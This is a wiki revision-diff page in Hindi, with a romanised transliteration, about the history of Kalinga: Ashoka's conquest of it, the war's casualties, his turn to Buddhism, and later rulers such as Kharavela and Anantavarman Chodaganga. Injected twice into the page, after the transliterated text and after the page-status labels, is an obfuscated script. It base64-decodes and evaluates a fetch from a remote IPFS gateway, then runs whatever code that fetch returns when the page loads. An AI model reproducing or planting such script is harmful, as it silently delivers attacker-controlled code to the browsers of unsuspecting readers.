Difference between revisions of "कलिंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*वर्तमान उड़ीसा राज्य प्राचीन काल में कलिंग के नाम से प्रसिद्ध था।   
+
*वर्तमान [[उड़ीसा]] राज्य प्राचीन काल में कलिंग के नाम से प्रसिद्ध था।   
*पहले यह [[नंदवंश]] के शासक [[महापद्मनंद]] के साम्राज्य का एक अंग था। कुछ समय के लिए [[मगध]] साम्राज्य से अलग हो गया था, परंतु [[अशोक]] ने गद्दी पर बैंठने के आठवें वर्ष इसे पुन: जीत लिया।  इस युद्ध में कलिंगवासियों ने अशोक की सेना का असाधारण प्रतिरोध किया।   
+
*पहले यह [[नंदवंश]] के शासक [[महापद्मनंद]] के साम्राज्य का एक अंग था। कुछ समय के लिए [[मगध]] साम्राज्य से अलग हो गया था, परंतु [[अशोक]] ने गद्दी पर बैंठने के आठवें वर्ष इसे पुन: जीत लिया।  इस युद्ध में कलिंगवासियों ने अशोक की सेना का असाधारण प्रतिरोध किया।   
*कलिंग के एक लाख व्यक्ति मारे गए, डेढ़ लाख बंदी बनाए गए और इससे कहीं अधिक संख्या में , युद्ध से हुए विनाश के कारण, बाद में मर गए।   
+
*कलिंग के एक लाख व्यक्ति मारे गए, डेढ़ लाख बंदी बनाए गए और इससे कहीं अधिक संख्या में, युद्ध से हुए विनाश के कारण, बाद में मर गए।   
 
*इसी विनाश को देखकर अशोक युद्ध के बदले धर्म-विजय की ओर प्रवृत्त हुआ था।   
 
*इसी विनाश को देखकर अशोक युद्ध के बदले धर्म-विजय की ओर प्रवृत्त हुआ था।   
*धौलगिरि नामक स्थान पर जहां अशोक की सेना का शिविर था और बाद में जहां उसने [[बौद्ध धर्म]] की दीक्षा ली थी, अब एक आकर्षक [[स्तूप]], मंदिर और शिलालेख विद्यमान हैं।
+
*धौलगिरि नामक स्थान पर जहां अशोक की सेना का शिविर था और बाद में जहाँ उसने [[बौद्ध धर्म]] की दीक्षा ली थी, अब एक आकर्षक [[स्तूप]], मंदिर और शिलालेख विद्यमान हैं।
 
*आगे की शताब्दियों में कलिंग ने अनेक परिवर्तन देखे। कभी खारवेल यहाँ के शासक बने तो कभी यह गुप्त साम्राज्य में मिला।   
 
*आगे की शताब्दियों में कलिंग ने अनेक परिवर्तन देखे। कभी खारवेल यहाँ के शासक बने तो कभी यह गुप्त साम्राज्य में मिला।   
 
*6वीं-7वीं शताब्दी में थोड़े समय के लिए यहाँ की सत्ता [[हर्षवर्धन]] के हाथों में भी रही।
 
*6वीं-7वीं शताब्दी में थोड़े समय के लिए यहाँ की सत्ता [[हर्षवर्धन]] के हाथों में भी रही।

Revision as of 05:24, 17 February 2011

  • vartaman u disa rajy prachin kal mean kaliang ke nam se prasiddh tha.
  • pahale yah nandavansh ke shasak mahapadmanand ke samrajy ka ek aang tha. kuchh samay ke lie magadh samrajy se alag ho gaya tha, parantu ashok ne gaddi par baianthane ke athavean varsh ise pun: jit liya. is yuddh mean kaliangavasiyoan ne ashok ki sena ka asadharan pratirodh kiya.
  • kaliang ke ek lakh vyakti mare ge, dedh lakh bandi banae ge aur isase kahian adhik sankhya mean, yuddh se hue vinash ke karan, bad mean mar ge.
  • isi vinash ko dekhakar ashok yuddh ke badale dharm-vijay ki or pravritt hua tha.
  • dhaulagiri namak sthan par jahaan ashok ki sena ka shivir tha aur bad mean jahaan usane bauddh dharm ki diksha li thi, ab ek akarshak stoop, mandir aur shilalekh vidyaman haian.
  • age ki shatabdiyoan mean kaliang ne anek parivartan dekhe. kabhi kharavel yahaan ke shasak bane to kabhi yah gupt samrajy mean mila.
  • 6vian-7vian shatabdi mean tho de samay ke lie yahaan ki satta harshavardhan ke hathoan mean bhi rahi.
  • anantavarma chodagang jo poorvi gang vansh ka pramukh raja tha. usane kaliang par 71 varsh (1076-1147 ee.) tak rajy kiya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh